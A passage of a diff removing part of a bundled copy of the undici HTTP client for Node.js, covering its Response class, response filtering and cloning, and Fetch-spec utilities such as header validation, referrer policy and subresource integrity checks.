= relevantRealm - - // 5. Set responseObject’s response’s status to status. - responseObject[kState].status = status - - // 6. Let value be parsedURL, serialized and isomorphic encoded. 
- const value = isomorphicEncode(URLSerializer(parsedURL)) - - // 7. Append `Location`/value to responseObject’s response’s header list. - responseObject[kState].headersList.append('location', value) - - // 8. Return responseObject. - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response - constructor (body = null, init = {}) { - if (body !== null) { - body = webidl.converters.BodyInit(body) - } - - init = webidl.converters.ResponseInit(init) - - // TODO - this[kRealm] = { settingsObject: {} } - - // 1. Set this’s response to a new response. - this[kState] = makeResponse({}) - - // 2. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is this’s response’s header list and guard - // is "response". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kGuard] = 'response' - this[kHeaders][kHeadersList] = this[kState].headersList - this[kHeaders][kRealm] = this[kRealm] - - // 3. Let bodyWithType be null. - let bodyWithType = null - - // 4. If body is non-null, then set bodyWithType to the result of extracting body. - if (body != null) { - const [extractedBody, type] = extractBody(body) - bodyWithType = { body: extractedBody, type } - } - - // 5. Perform initialize a response given this, init, and bodyWithType. - initializeResponse(this, init, bodyWithType) - } - - // Returns response’s type, e.g., "cors". - get type () { - webidl.brandCheck(this, Response) - - // The type getter steps are to return this’s response’s type. - return this[kState].type - } - - // Returns response’s URL, if it has one; otherwise the empty string. - get url () { - webidl.brandCheck(this, Response) - - const urlList = this[kState].urlList - - // The url getter steps are to return the empty string if this’s - // response’s URL is null; otherwise this’s response’s URL, - // serialized with exclude fragment set to true. - const url = urlList[urlList.length - 1] ?? 
null - - if (url === null) { - return '' - } - - return URLSerializer(url, true) - } - - // Returns whether response was obtained through a redirect. - get redirected () { - webidl.brandCheck(this, Response) - - // The redirected getter steps are to return true if this’s response’s URL - // list has more than one item; otherwise false. - return this[kState].urlList.length > 1 - } - - // Returns response’s status. - get status () { - webidl.brandCheck(this, Response) - - // The status getter steps are to return this’s response’s status. - return this[kState].status - } - - // Returns whether response’s status is an ok status. - get ok () { - webidl.brandCheck(this, Response) - - // The ok getter steps are to return true if this’s response’s status is an - // ok status; otherwise false. - return this[kState].status >= 200 && this[kState].status <= 299 - } - - // Returns response’s status message. - get statusText () { - webidl.brandCheck(this, Response) - - // The statusText getter steps are to return this’s response’s status - // message. - return this[kState].statusText - } - - // Returns response’s headers as Headers. - get headers () { - webidl.brandCheck(this, Response) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - get body () { - webidl.brandCheck(this, Response) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Response) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - // Returns a clone of response. - clone () { - webidl.brandCheck(this, Response) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || (this.body && this.body.locked)) { - throw webidl.errors.exception({ - header: 'Response.clone', - message: 'Body has already been consumed.' - }) - } - - // 2. Let clonedResponse be the result of cloning this’s response. - const clonedResponse = cloneResponse(this[kState]) - - // 3. 
Return the result of creating a Response object, given - // clonedResponse, this’s headers’s guard, and this’s relevant Realm. - const clonedResponseObject = new Response() - clonedResponseObject[kState] = clonedResponse - clonedResponseObject[kRealm] = this[kRealm] - clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList - clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - return clonedResponseObject - } -} - -mixinBody(Response) - -Object.defineProperties(Response.prototype, { - type: kEnumerableProperty, - url: kEnumerableProperty, - status: kEnumerableProperty, - ok: kEnumerableProperty, - redirected: kEnumerableProperty, - statusText: kEnumerableProperty, - headers: kEnumerableProperty, - clone: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Response', - configurable: true - } -}) - -Object.defineProperties(Response, { - json: kEnumerableProperty, - redirect: kEnumerableProperty, - error: kEnumerableProperty -}) - -// https://fetch.spec.whatwg.org/#concept-response-clone -function cloneResponse (response) { - // To clone a response response, run these steps: - - // 1. If response is a filtered response, then return a new identical - // filtered response whose internal response is a clone of response’s - // internal response. - if (response.internalResponse) { - return filterResponse( - cloneResponse(response.internalResponse), - response.type - ) - } - - // 2. Let newResponse be a copy of response, except for its body. - const newResponse = makeResponse({ ...response, body: null }) - - // 3. If response’s body is non-null, then set newResponse’s body to the - // result of cloning response’s body. - if (response.body != null) { - newResponse.body = cloneBody(response.body) - } - - // 4. Return newResponse. 
- return newResponse -} - -function makeResponse (init) { - return { - aborted: false, - rangeRequested: false, - timingAllowPassed: false, - requestIncludesCredentials: false, - type: 'default', - status: 200, - timingInfo: null, - cacheState: '', - statusText: '', - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList(), - urlList: init.urlList ? [...init.urlList] : [] - } -} - -function makeNetworkError (reason) { - const isError = isErrorLike(reason) - return makeResponse({ - type: 'error', - status: 0, - error: isError - ? reason - : new Error(reason ? String(reason) : reason), - aborted: reason && reason.name === 'AbortError' - }) -} - -function makeFilteredResponse (response, state) { - state = { - internalResponse: response, - ...state - } - - return new Proxy(response, { - get (target, p) { - return p in state ? state[p] : target[p] - }, - set (target, p, value) { - assert(!(p in state)) - target[p] = value - return true - } - }) -} - -// https://fetch.spec.whatwg.org/#concept-filtered-response -function filterResponse (response, type) { - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (type === 'basic') { - // A basic filtered response is a filtered response whose type is "basic" - // and header list excludes any headers in internal response’s header list - // whose name is a forbidden response-header name. - - // Note: undici does not implement forbidden response-header names - return makeFilteredResponse(response, { - type: 'basic', - headersList: response.headersList - }) - } else if (type === 'cors') { - // A CORS filtered response is a filtered response whose type is "cors" - // and header list excludes any headers in internal response’s header - // list whose name is not a CORS-safelisted response-header name, given - // internal response’s CORS-exposed header-name list. 
- - // Note: undici does not implement CORS-safelisted response-header names - return makeFilteredResponse(response, { - type: 'cors', - headersList: response.headersList - }) - } else if (type === 'opaque') { - // An opaque filtered response is a filtered response whose type is - // "opaque", URL list is the empty list, status is 0, status message - // is the empty byte sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaque', - urlList: Object.freeze([]), - status: 0, - statusText: '', - body: null - }) - } else if (type === 'opaqueredirect') { - // An opaque-redirect filtered response is a filtered response whose type - // is "opaqueredirect", status is 0, status message is the empty byte - // sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaqueredirect', - status: 0, - statusText: '', - headersList: [], - body: null - }) - } else { - assert(false) - } -} - -// https://fetch.spec.whatwg.org/#appropriate-network-error -function makeAppropriateNetworkError (fetchParams, err = null) { - // 1. Assert: fetchParams is canceled. - assert(isCancelled(fetchParams)) - - // 2. Return an aborted network error if fetchParams is aborted; - // otherwise return a network error. - return isAborted(fetchParams) - ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) - : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) -} - -// https://whatpr.org/fetch/1392.html#initialize-a-response -function initializeResponse (response, init, body) { - // 1. If init["status"] is not in the range 200 to 599, inclusive, then - // throw a RangeError. - if (init.status !== null && (init.status < 200 || init.status > 599)) { - throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') - } - - // 2. 
If init["statusText"] does not match the reason-phrase token production, - // then throw a TypeError. - if ('statusText' in init && init.statusText != null) { - // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: - // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) - if (!isValidReasonPhrase(String(init.statusText))) { - throw new TypeError('Invalid statusText') - } - } - - // 3. Set response’s response’s status to init["status"]. - if ('status' in init && init.status != null) { - response[kState].status = init.status - } - - // 4. Set response’s response’s status message to init["statusText"]. - if ('statusText' in init && init.statusText != null) { - response[kState].statusText = init.statusText - } - - // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. - if ('headers' in init && init.headers != null) { - fill(response[kHeaders], init.headers) - } - - // 6. If body was given, then: - if (body) { - // 1. If response's status is a null body status, then throw a TypeError. - if (nullBodyStatus.includes(response.status)) { - throw webidl.errors.exception({ - header: 'Response constructor', - message: 'Invalid response status code ' + response.status - }) - } - - // 2. Set response's body to body's body. - response[kState].body = body.body - - // 3. If body's type is non-null and response's header list does not contain - // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. 
- if (body.type != null && !response[kState].headersList.contains('Content-Type')) { - response[kState].headersList.append('content-type', body.type) - } - } -} - -webidl.converters.ReadableStream = webidl.interfaceConverter( - ReadableStream -) - -webidl.converters.FormData = webidl.interfaceConverter( - FormData -) - -webidl.converters.URLSearchParams = webidl.interfaceConverter( - URLSearchParams -) - -// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit -webidl.converters.XMLHttpRequestBodyInit = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { - return webidl.converters.BufferSource(V) - } - - if (util.isFormDataLike(V)) { - return webidl.converters.FormData(V, { strict: false }) - } - - if (V instanceof URLSearchParams) { - return webidl.converters.URLSearchParams(V) - } - - return webidl.converters.DOMString(V) -} - -// https://fetch.spec.whatwg.org/#bodyinit -webidl.converters.BodyInit = function (V) { - if (V instanceof ReadableStream) { - return webidl.converters.ReadableStream(V) - } - - // Note: the spec doesn't include async iterables, - // this is an undici extension. 
- if (V?.[Symbol.asyncIterator]) { - return V - } - - return webidl.converters.XMLHttpRequestBodyInit(V) -} - -webidl.converters.ResponseInit = webidl.dictionaryConverter([ - { - key: 'status', - converter: webidl.converters['unsigned short'], - defaultValue: 200 - }, - { - key: 'statusText', - converter: webidl.converters.ByteString, - defaultValue: '' - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - } -]) - -module.exports = { - makeNetworkError, - makeResponse, - makeAppropriateNetworkError, - filterResponse, - Response, - cloneResponse -} - - -/***/ }), - -/***/ 5861: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kUrl: Symbol('url'), - kHeaders: Symbol('headers'), - kSignal: Symbol('signal'), - kState: Symbol('state'), - kGuard: Symbol('guard'), - kRealm: Symbol('realm') -} - - -/***/ }), - -/***/ 2538: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { performance } = __nccwpck_require__(4074) -const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) -const assert = __nccwpck_require__(9491) -const { isUint8Array } = __nccwpck_require__(9830) - -// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable -/** @type {import('crypto')|undefined} */ -let crypto - -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -function responseURL (response) { - // https://fetch.spec.whatwg.org/#responses - // A response has an associated URL. It is a pointer to the last URL - // in response’s URL list and null if response’s URL list is empty. - const urlList = response.urlList - const length = urlList.length - return length === 0 ? 
null : urlList[length - 1].toString() -} - -// https://fetch.spec.whatwg.org/#concept-response-location-url -function responseLocationURL (response, requestFragment) { - // 1. If response’s status is not a redirect status, then return null. - if (!redirectStatusSet.has(response.status)) { - return null - } - - // 2. Let location be the result of extracting header list values given - // `Location` and response’s header list. - let location = response.headersList.get('location') - - // 3. If location is a header value, then set location to the result of - // parsing location with response’s URL. - if (location !== null && isValidHeaderValue(location)) { - location = new URL(location, responseURL(response)) - } - - // 4. If location is a URL whose fragment is null, then set location’s - // fragment to requestFragment. - if (location && !location.hash) { - location.hash = requestFragment - } - - // 5. Return location. - return location -} - -/** @returns {URL} */ -function requestCurrentURL (request) { - return request.urlList[request.urlList.length - 1] -} - -function requestBadPort (request) { - // 1. Let url be request’s current URL. - const url = requestCurrentURL(request) - - // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, - // then return blocked. - if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { - return 'blocked' - } - - // 3. Return allowed. - return 'allowed' -} - -function isErrorLike (object) { - return object instanceof Error || ( - object?.constructor?.name === 'Error' || - object?.constructor?.name === 'DOMException' - ) -} - -// Check whether |statusText| is a ByteString and -// matches the Reason-Phrase token production. 
-// RFC 2616: https://tools.ietf.org/html/rfc2616 -// RFC 7230: https://tools.ietf.org/html/rfc7230 -// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" -// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 -function isValidReasonPhrase (statusText) { - for (let i = 0; i < statusText.length; ++i) { - const c = statusText.charCodeAt(i) - if ( - !( - ( - c === 0x09 || // HTAB - (c >= 0x20 && c <= 0x7e) || // SP / VCHAR - (c >= 0x80 && c <= 0xff) - ) // obs-text - ) - ) { - return false - } - } - return true -} - -/** - * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 - * @param {number} c - */ -function isTokenCharCode (c) { - switch (c) { - case 0x22: - case 0x28: - case 0x29: - case 0x2c: - case 0x2f: - case 0x3a: - case 0x3b: - case 0x3c: - case 0x3d: - case 0x3e: - case 0x3f: - case 0x40: - case 0x5b: - case 0x5c: - case 0x5d: - case 0x7b: - case 0x7d: - // DQUOTE and "(),/:;<=>?@[\]{}" - return false - default: - // VCHAR %x21-7E - return c >= 0x21 && c <= 0x7e - } -} - -/** - * @param {string} characters - */ -function isValidHTTPToken (characters) { - if (characters.length === 0) { - return false - } - for (let i = 0; i < characters.length; ++i) { - if (!isTokenCharCode(characters.charCodeAt(i))) { - return false - } - } - return true -} - -/** - * @see https://fetch.spec.whatwg.org/#header-name - * @param {string} potentialValue - */ -function isValidHeaderName (potentialValue) { - return isValidHTTPToken(potentialValue) -} - -/** - * @see https://fetch.spec.whatwg.org/#header-value - * @param {string} potentialValue - */ -function isValidHeaderValue (potentialValue) { - // - Has no leading or trailing HTTP tab or space bytes. - // - Contains no 0x00 (NUL) or HTTP newline bytes. 
- if ( - potentialValue.startsWith('\t') || - potentialValue.startsWith(' ') || - potentialValue.endsWith('\t') || - potentialValue.endsWith(' ') - ) { - return false - } - - if ( - potentialValue.includes('\0') || - potentialValue.includes('\r') || - potentialValue.includes('\n') - ) { - return false - } - - return true -} - -// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect -function setRequestReferrerPolicyOnRedirect (request, actualResponse) { - // Given a request request and a response actualResponse, this algorithm - // updates request’s referrer policy according to the Referrer-Policy - // header (if any) in actualResponse. - - // 1. Let policy be the result of executing § 8.1 Parse a referrer policy - // from a Referrer-Policy header on actualResponse. - - // 8.1 Parse a referrer policy from a Referrer-Policy header - // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. - const { headersList } = actualResponse - // 2. Let policy be the empty string. - // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. - // 4. Return policy. - const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') - - // Note: As the referrer-policy can contain multiple policies - // separated by comma, we need to loop through all of them - // and pick the first valid one. - // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy - let policy = '' - if (policyHeader.length > 0) { - // The right-most policy takes precedence. - // The left-most policy is the fallback. - for (let i = policyHeader.length; i !== 0; i--) { - const token = policyHeader[i - 1].trim() - if (referrerPolicyTokens.has(token)) { - policy = token - break - } - } - } - - // 2. If policy is not the empty string, then set request’s referrer policy to policy. 
- if (policy !== '') { - request.referrerPolicy = policy - } -} - -// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check -function crossOriginResourcePolicyCheck () { - // TODO - return 'allowed' -} - -// https://fetch.spec.whatwg.org/#concept-cors-check -function corsCheck () { - // TODO - return 'success' -} - -// https://fetch.spec.whatwg.org/#concept-tao-check -function TAOCheck () { - // TODO - return 'success' -} - -function appendFetchMetadata (httpRequest) { - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header - - // 1. Assert: r’s url is a potentially trustworthy URL. - // TODO - - // 2. Let header be a Structured Header whose value is a token. - let header = null - - // 3. Set header’s value to r’s mode. - header = httpRequest.mode - - // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. - httpRequest.headersList.set('sec-fetch-mode', header) - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header - // TODO -} - -// https://fetch.spec.whatwg.org/#append-a-request-origin-header -function appendRequestOriginHeader (request) { - // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. - let serializedOrigin = request.origin - - // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. - if (request.responseTainting === 'cors' || request.mode === 'websocket') { - if (serializedOrigin) { - request.headersList.append('origin', serializedOrigin) - } - - // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: - } else if (request.method !== 'GET' && request.method !== 'HEAD') { - // 1. 
Switch on request’s referrer policy: - switch (request.referrerPolicy) { - case 'no-referrer': - // Set serializedOrigin to `null`. - serializedOrigin = null - break - case 'no-referrer-when-downgrade': - case 'strict-origin': - case 'strict-origin-when-cross-origin': - // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. - if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { - serializedOrigin = null - } - break - case 'same-origin': - // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. - if (!sameOrigin(request, requestCurrentURL(request))) { - serializedOrigin = null - } - break - default: - // Do nothing. - } - - if (serializedOrigin) { - // 2. Append (`Origin`, serializedOrigin) to request’s header list. - request.headersList.append('origin', serializedOrigin) - } - } -} - -function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { - // TODO - return performance.now() -} - -// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info -function createOpaqueTimingInfo (timingInfo) { - return { - startTime: timingInfo.startTime ?? 0, - redirectStartTime: 0, - redirectEndTime: 0, - postRedirectStartTime: timingInfo.startTime ?? 
0, - finalServiceWorkerStartTime: 0, - finalNetworkResponseStartTime: 0, - finalNetworkRequestStartTime: 0, - endTime: 0, - encodedBodySize: 0, - decodedBodySize: 0, - finalConnectionTimingInfo: null - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#policy-container -function makePolicyContainer () { - // Note: the fetch spec doesn't make use of embedder policy or CSP list - return { - referrerPolicy: 'strict-origin-when-cross-origin' - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container -function clonePolicyContainer (policyContainer) { - return { - referrerPolicy: policyContainer.referrerPolicy - } -} - -// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer -function determineRequestsReferrer (request) { - // 1. Let policy be request's referrer policy. - const policy = request.referrerPolicy - - // Note: policy cannot (shouldn't) be null or an empty string. - assert(policy) - - // 2. Let environment be request’s client. - - let referrerSource = null - - // 3. Switch on request’s referrer: - if (request.referrer === 'client') { - // Note: node isn't a browser and doesn't implement document/iframes, - // so we bypass this step and replace it with our own. - - const globalOrigin = getGlobalOrigin() - - if (!globalOrigin || globalOrigin.origin === 'null') { - return 'no-referrer' - } - - // note: we need to clone it as it's mutated - referrerSource = new URL(globalOrigin) - } else if (request.referrer instanceof URL) { - // Let referrerSource be request’s referrer. - referrerSource = request.referrer - } - - // 4. Let request’s referrerURL be the result of stripping referrerSource for - // use as a referrer. - let referrerURL = stripURLForReferrer(referrerSource) - - // 5. Let referrerOrigin be the result of stripping referrerSource for use as - // a referrer, with the origin-only flag set to true. - const referrerOrigin = stripURLForReferrer(referrerSource, true) - - // 6. 
If the result of serializing referrerURL is a string whose length is - // greater than 4096, set referrerURL to referrerOrigin. - if (referrerURL.toString().length > 4096) { - referrerURL = referrerOrigin - } - - const areSameOrigin = sameOrigin(request, referrerURL) - const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && - !isURLPotentiallyTrustworthy(request.url) - - // 8. Execute the switch statements corresponding to the value of policy: - switch (policy) { - case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) - case 'unsafe-url': return referrerURL - case 'same-origin': - return areSameOrigin ? referrerOrigin : 'no-referrer' - case 'origin-when-cross-origin': - return areSameOrigin ? referrerURL : referrerOrigin - case 'strict-origin-when-cross-origin': { - const currentURL = requestCurrentURL(request) - - // 1. If the origin of referrerURL and the origin of request’s current - // URL are the same, then return referrerURL. - if (sameOrigin(referrerURL, currentURL)) { - return referrerURL - } - - // 2. If referrerURL is a potentially trustworthy URL and request’s - // current URL is not a potentially trustworthy URL, then return no - // referrer. - if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { - return 'no-referrer' - } - - // 3. Return referrerOrigin. - return referrerOrigin - } - case 'strict-origin': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - case 'no-referrer-when-downgrade': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - - default: // eslint-disable-line - return isNonPotentiallyTrustWorthy ? 
'no-referrer' : referrerOrigin - } -} - -/** - * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url - * @param {URL} url - * @param {boolean|undefined} originOnly - */ -function stripURLForReferrer (url, originOnly) { - // 1. Assert: url is a URL. - assert(url instanceof URL) - - // 2. If url’s scheme is a local scheme, then return no referrer. - if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { - return 'no-referrer' - } - - // 3. Set url’s username to the empty string. - url.username = '' - - // 4. Set url’s password to the empty string. - url.password = '' - - // 5. Set url’s fragment to null. - url.hash = '' - - // 6. If the origin-only flag is true, then: - if (originOnly) { - // 1. Set url’s path to « the empty string ». - url.pathname = '' - - // 2. Set url’s query to null. - url.search = '' - } - - // 7. Return url. - return url -} - -function isURLPotentiallyTrustworthy (url) { - if (!(url instanceof URL)) { - return false - } - - // If child of about, return true - if (url.href === 'about:blank' || url.href === 'about:srcdoc') { - return true - } - - // If scheme is data, return true - if (url.protocol === 'data:') return true - - // If file, return true - if (url.protocol === 'file:') return true - - return isOriginPotentiallyTrustworthy(url.origin) - - function isOriginPotentiallyTrustworthy (origin) { - // If origin is explicitly null, return false - if (origin == null || origin === 'null') return false - - const originAsURL = new URL(origin) - - // If secure, return true - if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { - return true - } - - // If localhost or variants, return true - if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || - (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || - (originAsURL.hostname.endsWith('.localhost'))) { - return true - } - - // If any other, return false - return 
false - } -} - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist - * @param {Uint8Array} bytes - * @param {string} metadataList - */ -function bytesMatch (bytes, metadataList) { - // If node is not built with OpenSSL support, we cannot check - // a request's integrity, so allow it by default (the spec will - // allow requests if an invalid hash is given, as precedence). - /* istanbul ignore if: only if node is built with --without-ssl */ - if (crypto === undefined) { - return true - } - - // 1. Let parsedMetadata be the result of parsing metadataList. - const parsedMetadata = parseMetadata(metadataList) - - // 2. If parsedMetadata is no metadata, return true. - if (parsedMetadata === 'no metadata') { - return true - } - - // 3. If parsedMetadata is the empty set, return true. - if (parsedMetadata.length === 0) { - return true - } - - // 4. Let metadata be the result of getting the strongest - // metadata from parsedMetadata. - const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) - // get the strongest algorithm - const strongest = list[0].algo - // get all entries that use the strongest algorithm; ignore weaker - const metadata = list.filter((item) => item.algo === strongest) - - // 5. For each item in metadata: - for (const item of metadata) { - // 1. Let algorithm be the alg component of item. - const algorithm = item.algo - - // 2. Let expectedValue be the val component of item. - let expectedValue = item.hash - - // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e - // "be liberal with padding". This is annoying, and it's not even in the spec. - - if (expectedValue.endsWith('==')) { - expectedValue = expectedValue.slice(0, -2) - } - - // 3. Let actualValue be the result of applying algorithm to bytes. 
- let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') - - if (actualValue.endsWith('==')) { - actualValue = actualValue.slice(0, -2) - } - - // 4. If actualValue is a case-sensitive match for expectedValue, - // return true. - if (actualValue === expectedValue) { - return true - } - - let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') - - if (actualBase64URL.endsWith('==')) { - actualBase64URL = actualBase64URL.slice(0, -2) - } - - if (actualBase64URL === expectedValue) { - return true - } - } - - // 6. Return false. - return false -} - -// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options -// https://www.w3.org/TR/CSP2/#source-list-syntax -// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 -const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata - * @param {string} metadata - */ -function parseMetadata (metadata) { - // 1. Let result be the empty set. - /** @type {{ algo: string, hash: string }[]} */ - const result = [] - - // 2. Let empty be equal to true. - let empty = true - - const supportedHashes = crypto.getHashes() - - // 3. For each token returned by splitting metadata on spaces: - for (const token of metadata.split(' ')) { - // 1. Set empty to false. - empty = false - - // 2. Parse token as a hash-with-options. - const parsedToken = parseHashWithOptions.exec(token) - - // 3. If token does not parse, continue to the next token. - if (parsedToken === null || parsedToken.groups === undefined) { - // Note: Chromium blocks the request at this point, but Firefox - // gives a warning that an invalid integrity was given. The - // correct behavior is to ignore these, and subsequently not - // check the integrity of the resource. - continue - } - - // 4. Let algorithm be the hash-algo component of token. 
- const algorithm = parsedToken.groups.algo - - // 5. If algorithm is a hash function recognized by the user - // agent, add the parsed token to result. - if (supportedHashes.includes(algorithm.toLowerCase())) { - result.push(parsedToken.groups) - } - } - - // 4. Return no metadata if empty is true, otherwise return result. - if (empty === true) { - return 'no metadata' - } - - return result -} - -// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request -function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { - // TODO -} - -/** - * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} - * @param {URL} A - * @param {URL} B - */ -function sameOrigin (A, B) { - // 1. If A and B are the same opaque origin, then return true. - if (A.origin === B.origin && A.origin === 'null') { - return true - } - - // 2. If A and B are both tuple origins and their schemes, - // hosts, and port are identical, then return true. - if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { - return true - } - - // 3. Return false. - return false -} - -function createDeferredPromise () { - let res - let rej - const promise = new Promise((resolve, reject) => { - res = resolve - rej = reject - }) - - return { promise, resolve: res, reject: rej } -} - -function isAborted (fetchParams) { - return fetchParams.controller.state === 'aborted' -} - -function isCancelled (fetchParams) { - return fetchParams.controller.state === 'aborted' || - fetchParams.controller.state === 'terminated' -} - -const normalizeMethodRecord = { - delete: 'DELETE', - DELETE: 'DELETE', - get: 'GET', - GET: 'GET', - head: 'HEAD', - HEAD: 'HEAD', - options: 'OPTIONS', - OPTIONS: 'OPTIONS', - post: 'POST', - POST: 'POST', - put: 'PUT', - PUT: 'PUT' -} - -// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. 
-Object.setPrototypeOf(normalizeMethodRecord, null) - -/** - * @see https://fetch.spec.whatwg.org/#concept-method-normalize - * @param {string} method - */ -function normalizeMethod (method) { - return normalizeMethodRecord[method.toLowerCase()] ?? method -} - -// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string -function serializeJavascriptValueToJSONString (value) { - // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). - const result = JSON.stringify(value) - - // 2. If result is undefined, then throw a TypeError. - if (result === undefined) { - throw new TypeError('Value is not JSON serializable') - } - - // 3. Assert: result is a string. - assert(typeof result === 'string') - - // 4. Return result. - return result -} - -// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object -const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) - -/** - * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object - * @param {() => unknown[]} iterator - * @param {string} name name of the instance - * @param {'key'|'value'|'key+value'} kind - */ -function makeIterator (iterator, name, kind) { - const object = { - index: 0, - kind, - target: iterator - } - - const i = { - next () { - // 1. Let interface be the interface for which the iterator prototype object exists. - - // 2. Let thisValue be the this value. - - // 3. Let object be ? ToObject(thisValue). - - // 4. If object is a platform object, then perform a security - // check, passing: - - // 5. If object is not a default iterator object for interface, - // then throw a TypeError. - if (Object.getPrototypeOf(this) !== i) { - throw new TypeError( - `'next' called on an object that does not implement interface ${name} Iterator.` - ) - } - - // 6. Let index be object’s index. - // 7. Let kind be object’s kind. - // 8. Let values be object’s target's value pairs to iterate over. 
